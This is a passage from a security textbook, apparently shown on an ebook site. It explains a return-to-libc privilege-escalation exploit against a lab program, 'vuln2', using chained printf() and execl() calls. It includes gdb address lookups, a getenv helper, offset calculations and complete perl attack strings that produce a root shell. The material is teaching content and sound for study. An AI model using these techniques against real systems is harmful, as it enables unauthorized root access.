Great, we now have a way to keep the root privileges. Now all we need is a way to produce a NULL byte on the stack. There are several ways to do this; however, for illustrative purposes, we will use the printf() function as a wrapper around the execl() function. Recall that the %hn format token can be used to write into memory locations. To make this happen, we need to chain together more than one libc function call, as shown here:

Image

Just like we did before, we will overwrite the old saved eip with the address of the glibc printf() function. At that point, when the original vulnerable function returns, this new saved eip will be popped off the stack and printf() will be executed with the arguments starting with “%3$n”, which will write the number of bytes in the format string up to the format token (0x0000) into the third direct parameter. Since the third parameter contains the location of itself, the value of 0x0000 will be written into that spot. Next, the execl() function will be called with the arguments from the first “./wrapper” string onward. Voilà, we have created the desired execl() function on-the-fly with this self-modifying buffer attack string.

In order to build the preceding exploit, we need the following information:

• The address of the printf() function

• The address of the execl() function

• The address of the “%3$n” string in memory (we will use the environment section)

• The address of the “./wrapper” string in memory (we will use the environment section)

• The address of the location we wish to overwrite with a NULL value

Starting at the top, let’s get the addresses:


   BT book $ gdb -q vuln2
   Using host libthread_db library "/lib/tls/libthread_db.so.1".
   (gdb) b main 
   Breakpoint 1 at 0x80483aa
   (gdb) r
   Starting program: /mnt/sda1/book/book/vuln2

   Breakpoint 1, 0x080483aa in main ()
   (gdb) p printf
   $1 = {<text variable, no debug info>} 0xb7ee6580 <printf>
   (gdb) p execl
   $2 = {<text variable, no debug info>} 0xb7f2f870 <execl>
   (gdb) q
   The program is running.  Exit anyway? (y or n) y
   BT book $

We will use the environment section of memory to store our strings and retrieve their location with our handy get_env.c utility:


   BT book $ cat get_env.c
   //getenv.c
   #include <stdlib.h>
   int main(int argc, char *argv[]){
     char * addr;  //simple string to hold our input in bss section
     addr = getenv(argv[1]);  //initialize the addr var with input
     printf("%s is located at %p ", argv[1], addr);//display location
   }

Remember that the get_env program needs to be the same size as the vulnerable program, in this case vuln2 (five characters):


   BT book $ gcc -o gtenv get_env.c

Okay, we are ready to place the strings into memory and retrieve their locations:


   BT book $ export FMTSTR="%3$n"  //escape the $ with a backslash
   BT book $ echo $FMTSTR
   %3$n
   BT book $ ./gtenv FMTSTR
   FMTSTR is located at 0xbffffde5
   BT book $
   BT book $ export WRAPPER="./wrapper"
   BT book $ echo $WRAPPER
   ./wrapper
   BT book $ ./gtenv WRAPPER
   WRAPPER is located at 0xbffffe02
   BT book $

We have everything except the location of the last memory slot of our buffer. To determine this value, first we find the size of the vulnerable buffer. With this simple program, we have only one internal buffer, which will be located at the top of the stack when inside the vulnerable function main(). In the real world, a little more research will be required to find the location of the vulnerable buffer by looking at the disassembly and some trial and error.


   BT book $ gdb -q vuln2
   Using host libthread_db library "/lib/tls/libthread_db.so.1".
   (gdb) b main
   Breakpoint 1 at 0x80483aa 
   (gdb) r
   Starting program: /mnt/sda1/book/book/vuln2

   Breakpoint 1, 0x080483aa in main ()
   (gdb) disas main
   Dump of assembler code for function main:
   0x080483a4 <main+0>:  push  %ebp
   0x080483a5 <main+1>:  mov  %esp,%ebp
   0x080483a7 <main+3>:  sub  $0x18,%esp
   <truncated for brevity>

Now that we know the size of the vulnerable buffer and compiler-added padding (0x18 = 24), we can calculate the location of the sixth memory address by adding 24 + 6*4 = 48 = 0x30. Since we will place 4 bytes in that last location, the total size of the attack buffer will be 52 bytes.

Next, we will send a representative-size (52 bytes) buffer into our vulnerable program and find the location of the beginning of the vulnerable buffer with gdb by printing the value of $esp:


   (gdb)  r `perl -e 'print "AAAA"x13'`Quit
   Starting program: /mnt/sda1/book/book/vuln2 `perl -e 'print "AAAA"x13'`Quit

   Breakpoint 1, 0x080483aa in main ()
   (gdb) p $esp
   $1 = (void *) 0xbffff560
   (gdb)q
   The program is running.  Exit anyway? (y or n) y
   BT book $

Now that we have the location of the beginning of the buffer, add the calculated offset from earlier to get the correct target location (sixth memory slot after our overflowed buffer):


   0xbffff560 + 0x30 = 0xbffff590

Finally, we have all the data we need, so let’s attack!


   BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
   "x80x65xeexb7"."x70xf8xf2xb7"."xe5xfdxffxbf"."x02xfexff
   xbf"."x02xfexffxbf"."x90xf5xffxbf"' `
   sh-3.1# exit
   exit
   BT book $

Woot! It worked. Some of you may have realized that a shortcut exists here. If you look at the last illustration, you will notice the last value of the attack string is a NULL. Occasionally, you will run into this situation. In that rare case, you don’t care if you pass a NULL byte into the vulnerable program, as the string will terminate by a NULL anyway. So, in this canned scenario, you could have removed the printf() function and simply fed the execl() attack string as follows:


   ./vuln2 [filler of 28 bytes][&execl][&exit][./wrapper][./wrapper][x00]

Try it:


   BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
   "x70xf8xf2xb7"."xa0xe3xecxb7"."x02xfexffxbf"."x02xfexff
   xbf"."x00"' `
   sh-3.1# exit
   exit
   BT book $

Both ways work in this case. You will not always be as lucky, so you need to know both ways. See the “References” section for even more creative ways to return to libc.

Bottom Line

Now that we have discussed some of the more common techniques used for memory protection, how do they stack up? Of the ones we reviewed, ASLR (PaX and PIE) and non-executable memory (PaX and ExecShield) provide protection to both the stack and the heap. StackGuard, StackShield, SSP, and Libsafe provide protection to stack-based attacks only. The following table shows the differences in the approaches.

Image

References

Exploiting Software: How to Break Code (Greg Hoglund and Gary McGraw) Addison-Wesley, 2004

“Getting Around Non-executable Stack (and Fix)” (Solar Designer) www.imchris.org/projects/overflows/returntolibc1.html

Hacking: The Art of Exploitation (Jon Erickson) No Starch Press, 2003

Advanced return-into-lib(c) Exploits (PaX Case Study) (nergal) www.phrack.com/issues.html?issue=58&id=4#article

Shaun2k2’s libc exploits www.exploit-db.com/exploits/13197/

The Shellcoder’s Handbook: Discovering and Exploiting Security Holes

(Jack Koziol et al.) Wiley, 2004

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.118.163.250